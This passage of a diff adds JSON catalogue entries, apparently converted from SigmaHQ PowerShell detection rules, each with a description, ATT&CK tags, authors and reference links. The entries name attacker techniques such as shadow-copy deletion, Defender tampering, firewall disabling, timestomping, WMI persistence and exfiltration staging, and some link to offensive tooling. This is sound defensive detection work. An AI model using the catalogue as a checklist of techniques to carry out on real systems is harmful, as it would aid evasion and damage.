"frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", + "value": "Suspicious TCP Tunnel Via PowerShell Script", + "meta": { + "refs": [ + "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/07/08", + "filename": "posh_ps_susp_proxy_scripts.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "value": "Recon Information for Export with PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ], + "creation_date": "2021/07/30", + "filename": "posh_ps_susp_recon_export.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", + "value": "Remove Account From Domain Admin Group", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ], + "creation_date": "2021/12/26", + "filename": "posh_ps_susp_remove_adgroupmember.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "uuid": "22d80745-6f2c-46da-826b-77adaededd74", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "meta": { + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2022/10/24", + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "value": "Suspicious Get Information for SMB Share", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/15", + "filename": "posh_ps_susp_smb_share_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "value": "Suspicious SSL Connection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", + "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ], + "creation_date": "2022/01/23", + "filename": "posh_ps_susp_ssl_keyword.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Powershell use PassThru option to start in background", + "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", + "value": "Suspicious Start-Process PassThru", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2022/01/15", + "filename": "posh_ps_susp_start_process.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", + "value": "Suspicious Unblock-File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ], + "creation_date": "2022/02/01", + "filename": "posh_ps_susp_unblock_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", + "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", + "value": "Replace Desktop Wallpaper by Powershell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" + ], + "tags": [ + "attack.impact", + "attack.t1491.001" + ], + "creation_date": "2021/12/26", + "filename": "posh_ps_susp_wallpaper.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", + "uuid": "b26647de-4feb-4283-af6b-6117661283c5", + "value": "Powershell Suspicious Win32_PnPEntity", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ], + "creation_date": "2021/08/23", + "filename": "posh_ps_susp_win32_pnpentity.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Admin script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2021/12/26", + "filename": "posh_ps_susp_win32_shadowcopy.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/09/20", + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "value": "Suspicious PowerShell WindowStyle Option", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.003" + ], + "creation_date": "2021/10/20", + "filename": "posh_ps_susp_windowstyle.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", + "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", + "value": "PowerShell Write-EventLog Usage", + "meta": { + "refs": [ + "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/16", + "filename": "posh_ps_susp_write_eventlog.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ], + "creation_date": "2021/07/20", + "filename": "posh_ps_susp_zip_compress.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/05", + "filename": "posh_ps_syncappvpublishingserver_exe.yml", + "author": "Ensar \u015eamil, @sblmsrsn, OSCD Community", + "level": "medium", + "falsepositive": [ + "App-V clients" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "value": "Tamper Windows Defender - ScriptBlockLogging", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/01/16", + "filename": "posh_ps_tamper_defender.yml", + "author": "frack113, elhoim", + "level": "high", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "meta": { + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/05", + "filename": "posh_ps_tamper_defender_remove_mppreference.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "value": "Testing Usage of Uncommonly Used Port", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", + "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ], + "creation_date": "2022/01/23", + "filename": "posh_ps_test_netconnection.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", + "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", + "value": "Powershell Timestomp", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://www.offensive-security.com/metasploit-unleashed/timestomp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ], + "creation_date": "2021/08/03", + "filename": "posh_ps_timestomp.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate admin script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", + "value": "Powershell Trigger Profiles by Add_Content", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.013" + ], + "creation_date": "2021/08/18", + "filename": "posh_ps_trigger_profiles.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", + "value": "Windows PowerShell Upload Web Request", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", + "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "creation_date": "2022/01/07", + "filename": "posh_ps_upload.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/11/17", + "filename": "posh_ps_user_discovery_get_aduser.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "meta": { + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2022/10/17", + "filename": "posh_ps_using_set_service_to_hide_services.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", + "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", + "value": "Usage Of Web Request Commands And Cmdlets - PowerShell", + "meta": { + "refs": [ + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/24", + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", + "author": "James Pemberton / @4A616D6573", + "level": "medium", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", + "value": "PowerShell WMI Win32_Product Install MSI", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/04/24", + "filename": "posh_ps_win32_product_install_msi.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", + "value": "Windows Firewall Profile Disabled", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "http://woshub.com/manage-windows-firewall-powershell/", + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2021/10/12", + "filename": "posh_ps_windows_firewall_profile_disabled.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "value": "Winlogon Helper DLL", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ], + "creation_date": "2019/10/21", + "filename": "posh_ps_winlogon_helper_dll.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "value": "Windows Defender Exclusions Added - PowerShell", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/09/16", + "filename": "posh_ps_win_defender_exclusions_added.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects parameters used by WMImplant", + "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "value": "WMImplant Hack Tool", + "meta": { + "refs": [ + "https://github.com/FortyNorthSecurity/WMImplant", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ], + "creation_date": "2020/03/26", + "filename": "posh_ps_wmimplant.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Administrative scripts that use the same keywords." + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", + "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "value": "Powershell WMI Persistence", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.003" + ], + "creation_date": "2021/08/19", + "filename": "posh_ps_wmi_persistence.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", + "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", + "value": "WMIC Unquoted Services Path Lookup - PowerShell", + "meta": { + "refs": [ + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/06/20", + "filename": "posh_ps_wmi_unquoted_service_search.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "value": "Powershell XML Execute Command", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/01/19", + "filename": "posh_ps_xml_iex.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects shellcode injection by Metasploit's migrate and Empire's psinject", + "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "value": "Shellcode Injection", + "meta": { + "refs": [ + 